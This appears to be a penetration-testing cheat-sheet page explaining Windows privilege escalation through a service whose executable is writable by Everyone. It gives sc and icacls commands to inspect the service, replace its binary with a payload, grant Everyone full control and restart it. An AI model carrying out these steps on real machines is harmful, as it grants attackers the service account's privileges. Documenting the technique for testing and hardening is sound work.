Skip to main content

Insecure Permissions

If the executable associated with a Service has Weak Permissions that allow an Attacker to Modify or Replace it, the Attacker can gain the Privileges of the Service Account.

Analyzing the Service

In this case the VulnerableService Service has Weak Permissions that allows the Modification - Replacement. It is possible in this case to gain the Privileges of the Service.

:: Query Service Information
sc qc "VulnerableService"


Now we can proceed to check the Permissions on the Executable. We can see that the Group Everyone has Modify Permissions (M) on the Service Executable. This means we can Overwrite it with any Payload of our preference, and the Service will execute it with the Privileges of the configured User Account.

:: Show Executable Permissions
icacls C:\Service\Path\VulnService.exe


Replacing the Service

Note

If we need another User to execute the PAYLOAD, we need to grant the Correct Permissions to the Service Executable. In this case we grant Full Permission (F) to the Everyone Group: Everyone:(F)

:: Replace the Vulnerable Service Executable a PAYLOAD of your Preference
move C:\Payload\Path\Payload.exe C:\Service\Path\VulnService.exe

:: Assign new Permissions
icacls C:\Service\Path\VulnService.exe /grant Everyone:F

Restarting the Service

Note

In a Normal case Scenario we would likely have to wait for the Service to Restart if we don't have the Required Permissions to Restart the Service.

In case we have the Required Permissions to Restart the Service, we can use the sc command.

sc stop  "VulnerableService"
sc start "VulnerableService"